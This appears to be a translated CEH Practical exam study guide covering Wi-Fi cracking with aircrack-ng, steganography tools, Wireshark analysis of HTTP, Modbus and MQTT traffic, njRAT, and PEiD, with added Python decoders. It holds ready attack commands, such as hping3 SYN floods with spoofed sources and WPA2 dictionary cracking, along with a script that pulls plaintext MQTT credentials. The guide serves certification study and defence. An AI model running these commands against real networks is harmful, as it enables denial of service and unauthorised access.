![image](https://hackmd.io/_uploads/rJiD ZySvA.png)
![image](https://hackmd.io/_uploads/HyaUz1BDR.png)
Add a file on Win10
![image](https://hackmd.io/_uploads/H13jG1rD0.png)
Download flag.txt on the Parrot side
![image](https://hackmd.io/_uploads/rJzfX1HvA.png)
> [Felo search - FTP command reference](https://felo.ai/search/Nf792EUDyYIu2GrKZgihf)

### 3-3 Wireless Networks

:::info
CEH chapter 16
The aircrack-ng command-line tool
:::

> [<Addition> Aircrack-ng - WiFi password brute force](https://youtu.be/Hojxj1H3U_s?si=j7k7HNQ-tQHQmMZy)
![image](https://hackmd.io/_uploads/Bk2JVyHwA.png)
![image](https://hackmd.io/_uploads/BJturkBDC.png)
```bash
# WEP can be cracked directly (statistical attack on the IVs, no wordlist needed)
aircrack-ng WEPcrack-01.cap
# WPA2 cannot: the captured 4-way handshake has to be attacked with a dictionary
aircrack-ng WPA2crack-02.cap
aircrack-ng WPA2crack-02.cap -w /usr/share/wordlists/nmap.lst
```
![image](https://hackmd.io/_uploads/SyEgOyBP0.png)

CEH text excerpt
* Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2 PSK cracker, and analysis tool for 802.11 wireless networks. This program runs under Linux and Windows.
* `-w`: specifies the path to a wordlist
* `-a`: specifies the attack mode
> The CEH lab first captures packets with `airodump-ng` into a `*.cap` file and then cracks it with `aircrack-ng`
> CEHP gives you the capture file; you crack it directly with `aircrack-ng`
> ![image](https://hackmd.io/_uploads/r1jn1KPwA.png)
> * [Additional reference] [(雅技資訊日誌) airodump-ng -- wireless packet capture](https://atic-tw.blogspot.com/2014/01/airodump-ng.html)

### 3-4 Hashing and Decryption

:::info
CEH chapter 20
:::

* Cryptanalysis Tools - CrypTool (not on the exam)
> Triple DES (ECB)
![image](https://hackmd.io/_uploads/HJX0_Jrv0.png)
  * Attackers use cryptanalysis tools to analyze and break ciphers.
* Disk Encryption Tools - ==VeraCrypt== (on the exam)
  * You are given an encrypted file and a password; mount the volume and find the information the question asks for
![image](https://hackmd.io/_uploads/rydU5yrvC.png)
  * CEH text excerpt
    * Disk encryption is a technology that protects the confidentiality of the data stored on a disk by converting it into an unreadable code using disk encryption software or hardware, thus preventing unauthorized users from accessing it. Disk encryption provides confidentiality and privacy using passphrases and hidden volumes.
    * VeraCrypt is software for establishing and maintaining an on-the-fly-encrypted volume (data storage device). In on-the-fly encryption, data are automatically encrypted immediately before saving and decrypted immediately after loading, without any user intervention. No data stored on an encrypted volume can be read (decrypted) without using the correct password/keyfile(s) or correct encryption keys. The entire file system is encrypted (e.g., file names, folder names, free space, metadata, etc.).
    * Files can be copied to and from a mounted VeraCrypt volume just like they are copied to/from any normal disk (e.g., by simple drag-and-drop operations).
Files are automatically decrypted on the fly (in memory/RAM) while they are read or copied from an encrypted VeraCrypt volume. Similarly, files that are written or copied to the VeraCrypt volume are automatically encrypted on the fly (just before they are written to the disk) in RAM.
* File Fingerprinting - HashMyFiles (not examined on its own, but used together with other tasks) (no installation; find it and run it)
![image](https://hackmd.io/_uploads/rJwH1WBPA.png)
  * CEH text excerpt: HashMyFiles produces a hash value for a file using MD5, SHA1, CRC32, SHA-256, SHA-512, and SHA-384 algorithms. The program also provides information about the file, such as the full path of the file, date of creation, date of modification, file size, file attributes, file version, and extension, which helps in searching for and comparing similar files.
* [Addition] Cryptography Tools - ==BCTextEncoder== (no installation; find the tool and run it)
![image](https://hackmd.io/_uploads/ByJdvbHD0.png)
  * The exam gives you a ciphertext and a password; decrypt the ciphertext with the tool
  * Step 1 Encrypt (produce a ciphertext)
    * Enter a password when encrypting
![image](https://hackmd.io/_uploads/ByUKKGSPA.png)
    * On success the ciphertext appears in the lower pane
![image](https://hackmd.io/_uploads/B1CAKfHwA.png)
  * Step 2 Decrypt (load the ciphertext and decrypt; this is the exam part)
    * The ciphertext given in the question makes it obvious which tool produced it (BCTextEncoder output starts with a "-----BEGIN ENCODED MESSAGE-----" style banner), so you know which tool to decrypt with
![image](https://hackmd.io/_uploads/SyBqGZUP0.png)
    * Decrypt with the tool
![image](https://hackmd.io/_uploads/r1ISpzSDC.png)
  * CEH text excerpt: The BCTextEncoder utility simplifies the encoding and decoding of text data. It compresses, encrypts, and converts plaintext data into text format, which the user can then copy to the clipboard or save as a text file. It uses public key encryption methods as well as password-based encryption. Furthermore, it uses strong and approved symmetric and public-key algorithms for data encryption.
### 3-5 Steganography

> [Felo search - what steganography does](https://felo.ai/search/Kn0wEIYTTlmDkxLKpvPIW)
> Like an acrostic poem: you are given an image that hides information; use the Steganography Tools
> The tools are in CEH Module 06 Steganography Tools
> ![image](https://hackmd.io/_uploads/SJNSagUPC.png)

* https://www.offsec.com/metasploit-unleashed/timestomp/
* Image Steganography - OpenStego
  * Installation
> ![image](https://hackmd.io/_uploads/rJ6ye-BPR.png)
  * Step 1 Hide data in the image (produce an image with hidden information)
> ![image](https://hackmd.io/_uploads/rJ67fbrwR.png)
  * Step 2 Extract the hidden information from the image (the exam part)
  * The file extension may have been changed, so widen the file-type filter when loading
![image](https://hackmd.io/_uploads/rJs8rbrvC.png)
  * Choose the image to load and the output location
![image](https://hackmd.io/_uploads/SkDpHWHv0.png)
  * Click "Extract Data"
![image](https://hackmd.io/_uploads/Bk5RSWrPC.png)
  * The hidden text file can be extracted
![image](https://hackmd.io/_uploads/SJ8xLbHDC.png)
* Document Steganography - Snow (unlikely to be examined)
  * [FREE STEGANOGRAPHY TOOL TO HIDE MESSAGE IN TEXT USING WHITE SPACES](https://www.ilovefreesoftware.com/01/windows/free-steganography-tool-to-hide-message-in-text-using-white-spaces.html)
  * Text-based steganography that uses whitespace to conceal information.
  * CEH text excerpt
    * Whitespace steganography is used to ==conceal messages== in ASCII text ==by adding whitespaces== to the ends of the lines.
    * Snow is a program ==for concealing messages in text files by appending tabs and spaces to the ends of lines==, and ==for extracting messages from files containing hidden messages==. The user hides the data in the text file by appending sequences of up to ==seven spaces==, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent 0s and 1s. However, users rejected it because it uses fewer bytes but requires more columns per bit (4.5 vs. 2.67). An appended tab character is an indication of the start of the data, which allows the insertion of mail and news headers without corrupting the data.
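The description of Snow above is compact enough to implement, and doing so makes it obvious why a file with a hidden message still looks identical in an editor and how to spot one. The block below is an added example, not course material and not byte-compatible with SNOW.EXE (which additionally compresses the message and can encrypt it with ICE); the scheme is my own reading of the description: a leading tab marks the start of data, each 3-bit group is written as 0 to 7 spaces followed by a tab, and a 16-bit length prefix tells the decoder where the payload ends. The cover text in the usage is constructed.

```python
"""Whitespace steganography in the style described for Snow (added example; not
course material, not compatible with SNOW.EXE). Scheme (own design, after the
description): a leading tab marks the start, then every 3-bit group of the
payload becomes 0..7 spaces followed by a tab; the payload is a 16-bit
big-endian length followed by the message bytes. Cover text is assumed to use
plain "\n" line endings.
"""

GROUPS_PER_LINE = 4    # keep the appended whitespace short so lines look normal

def hide(cover: str, secret: bytes) -> str:
    """Append the encoded secret as trailing whitespace across the cover's lines."""
    payload = len(secret).to_bytes(2, "big") + secret
    bits = "".join(f"{b:08b}" for b in payload)
    bits += "0" * (-len(bits) % 3)                          # pad to whole 3-bit groups
    groups = [int(bits[i:i + 3], 2) for i in range(0, len(bits), 3)]
    lines = [ln.rstrip(" \t") for ln in cover.split("\n")]  # existing trailing ws would corrupt decoding
    needed = -(-len(groups) // GROUPS_PER_LINE)             # ceil division
    lines += [""] * max(0, needed - len(lines))             # extend the cover if it is too short
    out = []
    for idx, ln in enumerate(lines):
        chunk = groups[idx * GROUPS_PER_LINE:(idx + 1) * GROUPS_PER_LINE]
        marker = "\t" if idx == 0 else ""                   # the "appended tab" start indicator
        out.append(ln + marker + "".join(" " * g + "\t" for g in chunk))
    return "\n".join(out)

def reveal(text: str) -> bytes:
    """Recover the secret; returns b"" when no start marker is present."""
    ws = "".join(ln[len(ln.rstrip(" \t")):] for ln in text.split("\n"))
    if not ws.startswith("\t"):
        return b""
    bits = "".join(f"{len(field):03b}" for field in ws[1:].split("\t")[:-1])
    n = int(bits[:16], 2)
    body = bits[16:16 + 8 * n]
    return bytes(int(body[i:i + 8], 2) for i in range(0, len(body), 8))

def trailing_whitespace_lines(text: str) -> int:
    """Cheap detector: lines ending in spaces/tabs. A clean text file normally has none,
    so `cat -A file.txt` or this count is how you notice a Snow-style carrier."""
    return sum(1 for ln in text.split("\n") if ln != ln.rstrip(" \t"))

if __name__ == "__main__":
    cover = "Roses are red\nViolets are blue\nThis file looks ordinary\n"   # constructed
    carrier = hide(cover, b"Passing score: 70")
    print(repr(carrier[:60]))
    print("lines with trailing whitespace:", trailing_whitespace_lines(carrier))
    print("revealed:", reveal(carrier))
```

The visible text of the carrier equals the cover once trailing whitespace is stripped, which is the whole point; it also shows the weakness of the technique, since any editor configured to strip trailing whitespace on save destroys the message, and `wc -c` on the two files immediately reveals the size difference.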
> ![image](https://hackmd.io/_uploads/BJwSCx8wC.png)
```
SNOW.EXE -C -p ceh -m "Passing score: 70" <original>.txt <output>.txt
```
![image](https://hackmd.io/_uploads/H11zFZHv0.png)
![image](https://hackmd.io/_uploads/Bk2iF-rvC.png)
```
SNOW.EXE -C -p ceh <output>.txt
```

## 4. Traffic Analysis

:::success
Technique 1: Statistics > Protocol Hierarchy
Technique 2: Statistics > Conversations
Technique 3: Analyze > Follow > TCP Stream (see CEH chapter 8)
:::

### 4-1 HTTP Analysis

:::info
The Wireshark installer is in CEH chapter 3 (because chapter 3 covers "OS Discovery using Wireshark")
The OS can be identified from fields such as TTL and TCP window size
![image](https://hackmd.io/_uploads/BygEcWrDC.png)
Wireshark's main coverage is in CEH chapter 8, Sniffing
* Sniffing Tools: System administrators use automated tools to monitor their network, but attackers misuse these tools to sniff network data.
* Wireshark displays data from the TCP port with a feature known as "Follow TCP stream."
* To see the TCP stream, select a TCP packet in the packet list of a stream/connection and then select the Follow ➔ TCP Stream menu item from the Wireshark ==Analyze== menu.
:::
![image](https://hackmd.io/_uploads/SJF0sWHD0.png)
![image](https://hackmd.io/_uploads/HJUI2bSPA.png)
![image](https://hackmd.io/_uploads/HJIm6ZBvA.png)
![image](https://hackmd.io/_uploads/rJPD6-SDA.png)
![image](https://hackmd.io/_uploads/BJdipbBD0.png)
![image](https://hackmd.io/_uploads/rJeGkzBv0.png)
* Statistics > Protocol Hierarchy

### 4-2 Backdoors (Trojans)

:::info
Trojans (backdoors/malware) are in CEH chapter 7
![image](https://hackmd.io/_uploads/S1stJfSw0.png)
[The njRAT tool](https://felo.ai/search/Y2eKs-CRhza4jaJw3ZPOx)
This question does not test traffic analysis; it tests using njRAT to connect to a remote victim machine that already has the backdoor implanted and locating a file on it.
:::
Statistics > Conversations
![image](https://hackmd.io/_uploads/ByZVHzSPA.png)
![image](https://hackmd.io/_uploads/SkdnBMrDR.png)
In the exam you must find the key file and download it to the local machine to get the answer
![image](https://hackmd.io/_uploads/SkYEUGBvR.png)

### 4-3 Analysing Covert TCP traffic (not on the exam)

### 4-4 Analysing a SYN Flood

:::info
![image](https://hackmd.io/_uploads/ByRUm9PD0.png)
![image](https://hackmd.io/_uploads/B1UCNqwDA.png)
![image](https://hackmd.io/_uploads/HJZ5B9vPC.png)
:::

* Parrot host (not needed in the exam; no need to memorise)
```bash
# SYN flooding a victim
# --flood: send packets as fast as possible
# --rand-source: use random source addresses
# Demonstrated in the CEHP material; the CEH textbook body text does not mention it, but the lab does
hping3 --flood --rand-source -S -p 21 10.10.10.10
# -a <ip_address> or --spoof <ip_address>: spoof the source address
# Not in the CEHP material; the instructor's addition, but the CEH textbook covers it in Module 03
hping3 --flood -a 10.10.10.9 -S -p 21 10.10.10.10
```
* Capture packets on the Win10 host, save each run to its own file and compare the two (not needed in the exam; a capture file is provided for analysis)
* From the capture, determine which IP is the victim and which port is being attacked
* Technique: Statistics > Conversations (the victim is the address receiving a flood of one-packet conversations, and the port is the one they all target)

### 4-5 Analysing Modbus (OT)

:::info
Module 18 IoT and OT Hacking
* Modbus is a ==serial communication protocol== that is ==used with PLCs== and enables communication between many devices connected to the same network.
  * serial communication protocol: usually over RS-232/RS-485 interfaces
  * PLC: programmable logic controller
* Attackers use Wireshark to capture and analyze Modbus/TCP traffic on industrial networks.
* Modbus/TCP does not have any in-built encryption or security features, so attackers can easily gather information from the data packets being transmitted between the network and a Modbus port on a device.
  * Usually unencrypted
  * Many Modbus devices lack any effective user authentication
:::

* [Capture file download](https://github.com/ITI/ICS-Security-Tools/blob/master/pcaps/bro/modbus/modbus.pcap)
* Statistics > Protocol Hierarchy
![image](https://hackmd.io/_uploads/H15JhXBvC.png)
![image](https://hackmd.io/_uploads/ryYS37BDC.png)
![image](https://hackmd.io/_uploads/SJOV3QBwC.png)
* Filter: `modbus`, `modbus.func_code==1`
* [Modbus function codes](https://felo.ai/search/shTci4feDgM2wK-ppsVLO)

### 4-6 Addition: Analysing IoT

:::info
Module 18 IoT and OT Hacking
* Message Queuing Telemetry Transport (MQTT) is an ISO standard lightweight protocol used to transmit messages for ==long-range wireless communication==. It helps in establishing connections to remote locations, for example via satellite links.
* Port 1883 is the default MQTT port (8883 for MQTT over TLS)
:::

> [A complete guide to MQTT, the IoT messaging protocol](https://resource.webduino.io/blog/mqtt-guide)
> [[IoT protocols and security] An introduction to the MQTT protocol](https://medium.com/h1dra-security-team/%E7%89%A9%E8%81%AF%E7%B6%B2%E5%8D%94%E5%AE%9A%E8%88%87%E8%B3%87%E5%AE%89%E7%9A%84%E8%B7%9D%E9%9B%A2-mqtt-%E9%80%9A%E8%A8%8A%E5%8D%94%E5%AE%9A%E6%B7%BA%E8%AB%87-52d76ddc6ce6)
> [MQTT basics](https://youtu.be/N_HQ2GLZqoI?si=LfIiRC-BszLn2OLz)
> [How to Use Wireshark for MQTT Analysis: An In-depth Guide](https://cedalo.com/blog/wireshark-mqtt-guide/)

* Google keywords: MQTT pcap
* [Capture file download](https://github.com/pradeesi/MQTT-Wireshark-Capture/blob/master/mqtt_packets_tcpdump.pcap)
* Statistics > Protocol Hierarchy
* Filter: `mqtt`
* Watch the Publish messages: `mqtt.msgtype == 3`
![image](https://hackmd.io/_uploads/HyyKaXrD0.png)
* Analyze > Follow > TCP Stream
![image](https://hackmd.io/_uploads/H1xkRcDDC.png)
![image](https://hackmd.io/_uploads/SytmAqvvA.png)

## Supplement

* Malware analysis: PEiD (Portable Executable Identifier)

:::info
CEH chapter 7
`E:\CEH-Tools\CEHv12 Module 07 Malware Threats\Malware Analysis Tools\Static Malware Analysis Tools\Packaging and Obfuscation Tools\PEid`
![image](https://hackmd.io/_uploads/HkgqRmHvR.png)
![image](https://hackmd.io/_uploads/rkujR7HvC.png)
:::

* Follow the CEH textbook exercise (Identify Packaging and Obfuscation Methods using PEid)
> Packaging: packing
> Obfuscation
> Attackers often use packing and obfuscation or a packer to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file, and then runs the unpacked file.
![image](https://hackmd.io/_uploads/Hk_83DSPC.png)
* Displays the type of packer used in packing a program
![image](https://hackmd.io/_uploads/HJFnTvSPR.png)
* The exam asks for the Entrypoint value
* [Behaviour analysis: the first step to becoming a reversing master, understanding packing in a minute](https://ithelp.ithome.com.tw/articles/10188209)
> Generally the packer's stub runs first after the program is loaded, decrypting or restoring the original code; only after unpacking does execution reach the place where the original program really starts (the Original Entry Point, OEP). The Entrypoint PEiD shows for a packed file is therefore the stub's, not the OEP.
* [PEiD's main functions](https://felo.ai/search/RGkYWRa-6J16ufLhcwbbT)

* Vulnerability scanning: OpenVAS

:::info
CEH chapter 5
https://127.0.0.1:9392/login
admin/password
:::
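For the two traffic-analysis tasks in 4-5 and 4-6, Wireshark's `modbus.func_code` and `mqtt.msgtype` filters do the decoding, but the exam questions (which function code, which topic, what did the client log in with) are easier to answer with confidence once you have walked the bytes yourself. The block below is an added example, not course material: a minimal Modbus/TCP decoder (MBAP header plus PDU) and a minimal MQTT 3.1.1 decoder for the CONNECT and PUBLISH packets, run over packets constructed for this example rather than taken from the linked captures. It also shows why an unencrypted MQTT CONNECT leaks credentials and how a follow-TCP-stream view gets them.

```python
"""Hand-decoding Modbus/TCP and MQTT (added example; not course material).
All packets below are constructed for this example, not taken from the
linked pcap files.
"""
import struct

MODBUS_FUNCS = {1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
                4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
                15: "Write Multiple Coils", 16: "Write Multiple Registers"}

def parse_modbus_tcp(frame: bytes) -> dict:
    """Modbus/TCP = 7-byte MBAP header (tid, proto=0, length, unit id) + PDU (func code + data)."""
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0 or length != len(frame) - 6:          # length counts unit id + PDU
        raise ValueError("not a Modbus/TCP frame")
    fc, data = frame[7], frame[8:]
    info = {"transaction": tid, "unit": unit, "func_code": fc & 0x7F,
            "exception": bool(fc & 0x80),             # bit 7 set = exception response
            "name": MODBUS_FUNCS.get(fc & 0x7F, "other")}
    if info["func_code"] in (1, 2, 3, 4) and len(data) == 4:   # read request: start, quantity
        info["start"], info["quantity"] = struct.unpack(">HH", data)
    elif info["func_code"] in (5, 6) and len(data) == 4:        # write single: address, value
        info["address"], info["value"] = struct.unpack(">HH", data)
    elif info["exception"]:
        info["exception_code"] = data[0]
    return info

MQTT_TYPES = {1: "CONNECT", 2: "CONNACK", 3: "PUBLISH", 4: "PUBACK", 8: "SUBSCRIBE",
              9: "SUBACK", 12: "PINGREQ", 13: "PINGRESP", 14: "DISCONNECT"}

def _remaining_length(packet: bytes, i: int):
    """MQTT variable-length integer: 7 bits per byte, 0x80 = more bytes follow, max 4 bytes."""
    value, mult = 0, 1
    while True:
        b = packet[i]
        i += 1
        value += (b & 0x7F) * mult
        if not b & 0x80:
            return value, i
        mult *= 128
        if mult > 128 ** 3:
            raise ValueError("malformed remaining length")

def _utf8_field(buf: bytes, i: int):
    """MQTT string: 2-byte big-endian length followed by the bytes."""
    n = struct.unpack(">H", buf[i:i + 2])[0]
    return buf[i + 2:i + 2 + n].decode("utf-8"), i + 2 + n

def parse_mqtt(packet: bytes) -> dict:
    msgtype, flags = packet[0] >> 4, packet[0] & 0x0F
    remaining, i = _remaining_length(packet, 1)
    body = packet[i:i + remaining]
    info = {"msgtype": msgtype, "name": MQTT_TYPES.get(msgtype, "other")}
    if msgtype == 1:                                     # CONNECT
        _, j = _utf8_field(body, 0)                      # protocol name "MQTT"
        cflags = body[j + 1]                             # after the 1-byte protocol level
        j += 4                                           # skip level, connect flags, keep-alive
        info["client_id"], j = _utf8_field(body, j)
        if cflags & 0x04:                                # will flag: will topic + will message
            _, j = _utf8_field(body, j)
            _, j = _utf8_field(body, j)
        if cflags & 0x80:
            info["username"], j = _utf8_field(body, j)
        if cflags & 0x40:
            info["password"], j = _utf8_field(body, j)   # sent in the clear on port 1883
    elif msgtype == 3:                                   # PUBLISH
        qos = (flags >> 1) & 0x03
        info["topic"], j = _utf8_field(body, 0)
        if qos:                                          # packet identifier only for QoS 1/2
            info["packet_id"], j = struct.unpack(">H", body[j:j + 2])[0], j + 2
        info["qos"], info["payload"] = qos, body[j:]
    return info

def plaintext_credentials(packets):
    """What 'Follow TCP Stream' on a broker connection shows: every CONNECT's username/password."""
    found = []
    for pkt in packets:
        p = parse_mqtt(pkt)
        if p["msgtype"] == 1 and "username" in p:
            found.append((p["client_id"], p["username"], p.get("password")))
    return found

def _mqtt_str(s: str) -> bytes:
    return struct.pack(">H", len(s)) + s.encode()

# Constructed sample packets
MODBUS_READ_COILS = bytes.fromhex("0001 0000 0006 01 01 0000 0008".replace(" ", ""))
MODBUS_WRITE_COIL = bytes.fromhex("0002 0000 0006 01 05 0003 ff00".replace(" ", ""))
MODBUS_EXCEPTION = bytes.fromhex("0003 0000 0003 01 81 02".replace(" ", ""))
_connect_body = (_mqtt_str("MQTT") + bytes([4, 0xC2]) + struct.pack(">H", 60)
                 + _mqtt_str("sensor-01") + _mqtt_str("admin") + _mqtt_str("hunter2"))
MQTT_CONNECT = bytes([0x10, len(_connect_body)]) + _connect_body
_publish_body = _mqtt_str("plant/boiler/temp") + b"98.6"
MQTT_PUBLISH = bytes([0x30, len(_publish_body)]) + _publish_body

if __name__ == "__main__":
    for f in (MODBUS_READ_COILS, MODBUS_WRITE_COIL, MODBUS_EXCEPTION):
        print(parse_modbus_tcp(f))
    print(parse_mqtt(MQTT_CONNECT))
    print(parse_mqtt(MQTT_PUBLISH))
    print(plaintext_credentials([MQTT_CONNECT, MQTT_PUBLISH]))
```

The Wireshark filter `modbus.func_code==1` from 4-5 matches the low seven bits of the function-code byte, so exception responses (0x81) appear under it as well; `mqtt.msgtype == 3` from 4-6 matches the high nibble of the MQTT fixed header. Neither protocol authenticates or encrypts anything on its default port, so the decoders above recover everything an on-path attacker sees.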